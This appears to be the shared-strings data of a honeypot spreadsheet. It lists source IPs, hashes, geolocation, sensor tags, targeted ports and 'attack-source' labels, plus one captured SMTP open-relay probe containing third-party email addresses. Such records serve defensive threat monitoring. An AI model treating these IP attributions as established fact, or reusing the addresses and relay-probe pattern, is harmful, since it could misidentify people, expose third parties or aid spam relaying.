    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H45</t>
  </si>
  <si>
    <t>::ffff:2e76:bd09</t>
  </si>
  <si>
    <t>056dc6303f15ce8fc187c9a5ea815466</t>
  </si>
  <si>
    <t>175.211.208.198</t>
  </si>
  <si>
    <t>Gapyeong-gun</t>
  </si>
  <si>
    <t>Gapyeong County (Sincheonjungang-ro)</t>
  </si>
  <si>
    <t>1843082</t>
  </si>
  <si>
    <t>37.6773</t>
  </si>
  <si>
    <t>127.491</t>
  </si>
  <si>
    <t>::ffff:afd3:d0c6</t>
  </si>
  <si>
    <t>95dd445d5d6211eb7a3d552967f39052</t>
  </si>
  <si>
    <t>46.119.132.238</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H12</t>
  </si>
  <si>
    <t>::ffff:2e77:84ee</t>
  </si>
  <si>
    <t>364b5d6b13b510b42a7aa3bd7534e31e</t>
  </si>
  <si>
    <t>178.137.135.170</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H29</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;NA&amp;&amp;46535&amp;&amp;57215</t>
  </si>
  <si>
    <t>::ffff:b289:87aa</t>
  </si>
  <si>
    <t>9312bc839109f4f12c75ae3f87b1418e</t>
  </si>
  <si>
    <t>46.119.22.163</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_MT-CPA_H43&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H9</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;31093&amp;&amp;54562&amp;&amp;NA</t>
  </si>
  <si>
    <t>Zakarpattia</t>
  </si>
  <si>
    <t>Uzhhorod Raion</t>
  </si>
  <si>
    <t>Uzhhorod</t>
  </si>
  <si>
    <t>690548</t>
  </si>
  <si>
    <t>48.6208</t>
  </si>
  <si>
    <t>22.2879</t>
  </si>
  <si>
    <t>::ffff:2e77:16a3</t>
  </si>
  <si>
    <t>72066b6b2a9f34f5e8513ae47809fc68</t>
  </si>
  <si>
    <t>79.23.223.187</t>
  </si>
  <si>
    <t>NA&amp;&amp;host-79-23-223-187.retail.telecomitalia.it</t>
  </si>
  <si>
    <t>41.8919</t>
  </si>
  <si>
    <t>12.5113</t>
  </si>
  <si>
    <t>::ffff:4f17:dfbb</t>
  </si>
  <si>
    <t>0467ab08963f9a177d83bd3d7d120ef4</t>
  </si>
  <si>
    <t>134.249.56.54</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H28&amp;&amp;SMA-LAB_SSH_H37&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;22&amp;&amp;23&amp;&amp;NA&amp;&amp;57673</t>
  </si>
  <si>
    <t>::ffff:86f9:3836</t>
  </si>
  <si>
    <t>69105a41551cc18e548ad29b2c1f5166</t>
  </si>
  <si>
    <t>146.190.19.132</t>
  </si>
  <si>
    <t>1098</t>
  </si>
  <si>
    <t>52.3563</t>
  </si>
  <si>
    <t>4.95714</t>
  </si>
  <si>
    <t>::ffff:92be:1384</t>
  </si>
  <si>
    <t>9322a21198b4a73c8bfe9c89750d358c</t>
  </si>
  <si>
    <t>117.195.252.48</t>
  </si>
  <si>
    <t>::ffff:75c3:fc30</t>
  </si>
  <si>
    <t>43d2624f8abab683702785e7d96b248c</t>
  </si>
  <si>
    <t>117.195.208.238</t>
  </si>
  <si>
    <t>::ffff:75c3:d0ee</t>
  </si>
  <si>
    <t>b90205bb46e47671270b511434872724</t>
  </si>
  <si>
    <t>117.192.198.156</t>
  </si>
  <si>
    <t>25.3167</t>
  </si>
  <si>
    <t>83.0104</t>
  </si>
  <si>
    <t>::ffff:75c0:c69c</t>
  </si>
  <si>
    <t>1aab8ee040e659aac97a82db925f50bc</t>
  </si>
  <si>
    <t>211.72.80.162</t>
  </si>
  <si>
    <t>211-72-80-162.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H45</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;44351&amp;&amp;23&amp;&amp;9100&amp;&amp;NA</t>
  </si>
  <si>
    <t>1999-11-23</t>
  </si>
  <si>
    <t>::ffff:d348:50a2</t>
  </si>
  <si>
    <t>8d7f17c6183379c21c35d78600faff15</t>
  </si>
  <si>
    <t>46.185.35.179</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H32</t>
  </si>
  <si>
    <t>::ffff:2eb9:23b3</t>
  </si>
  <si>
    <t>73fe2513efa19b3c03d1232f7c2f52a8</t>
  </si>
  <si>
    <t>117.192.138.41</t>
  </si>
  <si>
    <t>::ffff:75c0:8a29</t>
  </si>
  <si>
    <t>b3edb9d17a47bdd2a8fa0814b328606c</t>
  </si>
  <si>
    <t>117.203.133.124</t>
  </si>
  <si>
    <t>::ffff:75cb:857c</t>
  </si>
  <si>
    <t>65d4c1ceabc75b40fdfb9b720e0ca802</t>
  </si>
  <si>
    <t>37.115.78.83</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H8</t>
  </si>
  <si>
    <t>::ffff:2573:4e53</t>
  </si>
  <si>
    <t>41c0c8b8fb36d89de6e36647735138c9</t>
  </si>
  <si>
    <t>117.209.100.42</t>
  </si>
  <si>
    <t>::ffff:75d1:642a</t>
  </si>
  <si>
    <t>c3038cb18f07d7280815a1f8305bc4ad</t>
  </si>
  <si>
    <t>176.37.183.232</t>
  </si>
  <si>
    <t>host-176-37-183-232.b025.la.net.ua&amp;&amp;NA</t>
  </si>
  <si>
    <t>23&amp;&amp;60914&amp;&amp;NA</t>
  </si>
  <si>
    <t>2011-05-20</t>
  </si>
  <si>
    <t>::ffff:b025:b7e8</t>
  </si>
  <si>
    <t>50e5cab2074472183fd6521b7ae6e0c8</t>
  </si>
  <si>
    <t>46.119.43.11</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H21&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H28</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;14680&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>50.4501</t>
  </si>
  <si>
    <t>30.5234</t>
  </si>
  <si>
    <t>::ffff:2e77:2b0b</t>
  </si>
  <si>
    <t>c668906098d4d1b7b9b8a7a8d3ac6111</t>
  </si>
  <si>
    <t>113.160.97.105</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_SMB_H27&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_SMB_H10&amp;&amp;SMA-LAB_MSSQL_H25&amp;&amp;SMA-LAB_MSSQL_H10</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;26849&amp;&amp;1433&amp;&amp;445&amp;&amp;50742</t>
  </si>
  <si>
    <t>Haiphong</t>
  </si>
  <si>
    <t>1581298</t>
  </si>
  <si>
    <t>20.8648</t>
  </si>
  <si>
    <t>106.683</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (113.160.97.105,60303)}&amp;&amp;{Data_SMB:Incoming connection (113.160.97.105,60388)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (113.160.97.105,60852)}</t>
  </si>
  <si>
    <t>::ffff:71a0:6169</t>
  </si>
  <si>
    <t>e2c4befaa0f3d0a36e944b969ba089a2</t>
  </si>
  <si>
    <t>176.8.114.251</t>
  </si>
  <si>
    <t>::ffff:b008:72fb</t>
  </si>
  <si>
    <t>b02cb405aefaa62d13d5652f35d5132b</t>
  </si>
  <si>
    <t>120.61.84.78</t>
  </si>
  <si>
    <t>::ffff:783d:544e</t>
  </si>
  <si>
    <t>afa2efbe446c18fabb104ed56e571584</t>
  </si>
  <si>
    <t>59.92.160.244</t>
  </si>
  <si>
    <t>::ffff:3b5c:a0f4</t>
  </si>
  <si>
    <t>1beed917c483282aebad2ef15840379c</t>
  </si>
  <si>
    <t>59.95.125.205</t>
  </si>
  <si>
    <t>::ffff:3b5f:7dcd</t>
  </si>
  <si>
    <t>9dd52c8f319e2faa18c11b0649698c92</t>
  </si>
  <si>
    <t>111.252.166.195</t>
  </si>
  <si>
    <t>111-252-166-195.dynamic-ip.hinet.net</t>
  </si>
  <si>
    <t>::ffff:6ffc:a6c3</t>
  </si>
  <si>
    <t>e097148ce784faea498e96dda4ed2f4e</t>
  </si>
  <si>
    <t>49.37.130.164</t>
  </si>
  <si>
    <t>::ffff:3125:82a4</t>
  </si>
  <si>
    <t>317516478130105b1917b4ab076d7aa9</t>
  </si>
  <si>
    <t>178.137.80.149</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_SSH_H19&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H33</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;22&amp;&amp;51951&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:b289:5095</t>
  </si>
  <si>
    <t>a8c8a080036bf212219d3b70e4607b11</t>
  </si>
  <si>
    <t>47.201.99.28</t>
  </si>
  <si>
    <t>47-201-99-28.fdr01.zphy.fl.ip.frontiernet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:ssh']</t>
  </si>
  <si>
    <t>Hillsborough</t>
  </si>
  <si>
    <t>Tampa</t>
  </si>
  <si>
    <t>4174757</t>
  </si>
  <si>
    <t>33606</t>
  </si>
  <si>
    <t>27.9517</t>
  </si>
  <si>
    <t>-82.4588</t>
  </si>
  <si>
    <t>::ffff:2fc9:631c</t>
  </si>
  <si>
    <t>914ceb0dd6c6b1e3ac6e0f7e3feff0e4</t>
  </si>
  <si>
    <t>117.195.208.244</t>
  </si>
  <si>
    <t>::ffff:75c3:d0f4</t>
  </si>
  <si>
    <t>b6d5d7be0eb6f8219fb67e39ce355d95</t>
  </si>
  <si>
    <t>46.185.67.96</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H33</t>
  </si>
  <si>
    <t>::ffff:2eb9:4360</t>
  </si>
  <si>
    <t>4fd6faa186c0a24e1bbf5d44f897078f</t>
  </si>
  <si>
    <t>46.119.173.42</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H47</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;40919&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:2e77:ad2a</t>
  </si>
  <si>
    <t>ccb067e2d80151db74495d1bd28755dc</t>
  </si>
  <si>
    <t>46.119.219.9</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_MT-CPA_H42&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;9134&amp;&amp;23&amp;&amp;51095&amp;&amp;52107&amp;&amp;36352&amp;&amp;NA&amp;&amp;19076</t>
  </si>
  <si>
    <t>::ffff:2e77:db09</t>
  </si>
  <si>
    <t>3d5794c596aa8e79b013d9ba668045d1</t>
  </si>
  <si>
    <t>85.239.236.9</t>
  </si>
  <si>
    <t>vmi2495273.contaboserver.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>King</t>
  </si>
  <si>
    <t>Seattle</t>
  </si>
  <si>
    <t>5809844</t>
  </si>
  <si>
    <t>98111</t>
  </si>
  <si>
    <t>47.6061</t>
  </si>
  <si>
    <t>-122.333</t>
  </si>
  <si>
    <t>::ffff:55ef:ec09</t>
  </si>
  <si>
    <t>f2e223cf4a0afc18a3eab91508483d75</t>
  </si>
  <si>
    <t>184.171.245.164</t>
  </si>
  <si>
    <t>NA&amp;&amp;victoria.basis.com.br</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H17</t>
  </si>
  <si>
    <t>Orlando (Central Business District)</t>
  </si>
  <si>
    <t>4167147</t>
  </si>
  <si>
    <t>32826</t>
  </si>
  <si>
    <t>28.5406</t>
  </si>
  <si>
    <t>-81.3786</t>
  </si>
  <si>
    <t>33182</t>
  </si>
  <si>
    <t>HostDime.com, Inc.</t>
  </si>
  <si>
    <t>::ffff:b8ab:f5a4</t>
  </si>
  <si>
    <t>0441c5ef9313b5b0781bf62e038463ca</t>
  </si>
  <si>
    <t>59.183.155.68</t>
  </si>
  <si>
    <t>Fatehgarh Sahib</t>
  </si>
  <si>
    <t>Khamānon Kalān</t>
  </si>
  <si>
    <t>1267105</t>
  </si>
  <si>
    <t>30.8172</t>
  </si>
  <si>
    <t>76.3548</t>
  </si>
  <si>
    <t>::ffff:3bb7:9b44</t>
  </si>
  <si>
    <t>df47f7acd685663d21310e5afbd44400</t>
  </si>
  <si>
    <t>117.245.215.87</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>50777&amp;&amp;23</t>
  </si>
  <si>
    <t>::ffff:75f5:d757</t>
  </si>
  <si>
    <t>b0b1fa315dc8b8c64e9658311ffe9284</t>
  </si>
  <si>
    <t>125.229.209.152</t>
  </si>
  <si>
    <t>NA&amp;&amp;125-229-209-152.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H37</t>
  </si>
  <si>
    <t>23&amp;&amp;34072&amp;&amp;34057&amp;&amp;38109&amp;&amp;34087&amp;&amp;34112&amp;&amp;34125&amp;&amp;34132&amp;&amp;34099&amp;&amp;34143&amp;&amp;34157&amp;&amp;34166&amp;&amp;34179&amp;&amp;34190&amp;&amp;34200&amp;&amp;34216&amp;&amp;34228&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:7de5:d198</t>
  </si>
  <si>
    <t>531602a67064a484bfca29a1990f7492</t>
  </si>
  <si>
    <t>165.154.236.126</t>
  </si>
  <si>
    <t>SMA-LAB_SMTP_HC1&amp;&amp;SMA-LAB_SMTP_H9</t>
  </si>
  <si>
    <t>{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'RSET', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'from:&lt;spameri@tiscali.it&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'to:&lt;spameri@tiscali.it&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'DATA', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000D_
To: spameri@tiscali.it_x000D_
Date: Fri, 21 Mar 2025 00:45:27 +0800_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;sp998@ozyegin.edu.tr&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;abbaghali135@yahoo.fr&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;fbidavjackson102100@gmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;NA&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '154.26.156.60_x000D_
To: spameri@tiscali.it_x000D_
Date: Fri, 21 Mar 2025 18:36:18 +0800_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;ibepaul01@hotmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000D_
To: spameri@tiscali.it_x000D_
Date: Sun, 6 Apr 2025 22:09:03 +0800_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;pwarren@value.net&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '156.244.8.69_x000D_
To: spameri@tiscali.it_x000D_
Date: Mon, 7 Apr 2025 02:32:36 +0800_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}</t>
  </si>
  <si>
    <t>::ffff:a59a:ec7e</t>
  </si>
  <si>
    <t>71e9f8b64bee797b1a3845a41b1bdca0</t>
  </si>
  <si>
    <t>116.75.255.117</t>
  </si>
  <si>
    <t>::ffff:744b:ff75</t>
  </si>
  <si>
    <t>308a8980f780822d77e623f536f5da7d</t>
  </si>
  <si>
    <t>182.152.237.50</t>
  </si>
  <si>
    <t>::ffff:b698:ed32</t>
  </si>
  <si>
    <t>1c81b0bb58e50ba6f6e34060a028005e</t>
  </si>
  <si>
    <t>178.137.128.221</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>Lviv</t>
  </si>
  <si>
    <t>Lvivskyi Raion</t>
  </si>
  <si>
    <t>702550</t>
  </si>
  <si>
    <t>49.8383</t>
  </si>
  <si>
    <t>24.0232</t>
  </si>
  <si>
    <t>::ffff:b289:80dd</t>
  </si>
  <si>
    <t>1e8d420696d57f563f98f114b8ef0752</t>
  </si>
  <si>
    <t>46.119.193.166</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H47</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;48445&amp;&amp;9947&amp;&amp;37571&amp;&amp;42168&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:2e77:c1a6</t>
  </si>
  <si>
    <t>315d1134ff5b1e63064dfd22067f8bc3</t>
  </si>
  <si>
    <t>46.118.20.209</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>Kremenchuk</t>
  </si>
  <si>
    <t>704147</t>
  </si>
  <si>
    <t>49.0658</t>
  </si>
  <si>
    <t>33.41</t>
  </si>
  <si>
    <t>::ffff:2e76:14d1</t>
  </si>
  <si>
    <t>cbd5b3b4ad3dffb1300c9814a13e6116</t>
  </si>
  <si>
    <t>59.27.250.117</t>
  </si>
  <si>
    <t>Cheonan-si</t>
  </si>
  <si>
    <t>Cheonan-si (Seobuk-gu)</t>
  </si>
  <si>
    <t>1845757</t>
  </si>
  <si>
    <t>36.8927</t>
  </si>
  <si>
    <t>127.162</t>
  </si>
  <si>
    <t>::ffff:3b1b:fa75</t>
  </si>
  <si>
    <t>9ea2789287c27ceea3e06a42c3ea28db</t>
  </si>
  <si>
    <t>195.47.194.160</t>
  </si>
  <si>
    <t>CY</t>
  </si>
  <si>
    <t>Cyprus</t>
  </si>
  <si>
    <t>Nicosia</t>
  </si>
  <si>
    <t>146268</t>
  </si>
  <si>
    <t>35.1856</t>
  </si>
  <si>
    <t>33.3823</t>
  </si>
  <si>
    <t>2003-04-01</t>
  </si>
  <si>
    <t>::ffff:c32f:c2a0</t>
  </si>
  <si>
    <t>8346d1fe598f78ca8081e594b7aaef8c</t>
  </si>
  <si>
    <t>120.61.24.168</t>
  </si>
  <si>
    <t>::ffff:783d:18a8</t>
  </si>
  <si>
    <t>83ef9c1e75239be700d6534f4d44892c</t>
  </si>
  <si>
    <t>117.233.186.221</t>
  </si>
  <si>
    <t>::ffff:75e9:badd</t>
  </si>
  <si>
    <t>55c79f7469765a19677595e40d3d31e0</t>
  </si>
  <si>
    <t>46.119.61.9</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H39</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;20044&amp;&amp;NA&amp;&amp;41889</t>
  </si>
  <si>
    <t>Volyn</t>
  </si>
  <si>
    <t>Kovel</t>
  </si>
  <si>
    <t>704617</t>
  </si>
  <si>
    <t>51.2153</t>
  </si>
  <si>
    <t>24.7087</t>
  </si>
  <si>
    <t>::ffff:2e77:3d09</t>
  </si>
  <si>
    <t>640d79c66270b6efa2e55d50909f6e4c</t>
  </si>
  <si>
    <t>80.117.69.168</t>
  </si>
  <si>
    <t>host-80-117-69-168.retail.telecomitalia.it&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_PJL_HC1&amp;&amp;SMA-LAB_TELNET_H2</t>
  </si>
  <si>
    <t>9100&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>{Data_PJL:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:5075:45a8</t>
  </si>
  <si>
    <t>fc38c64a859830f9e2941208ad2ceef8</t>
  </si>
  <si>
    <t>117.193.102.161</t>
  </si>
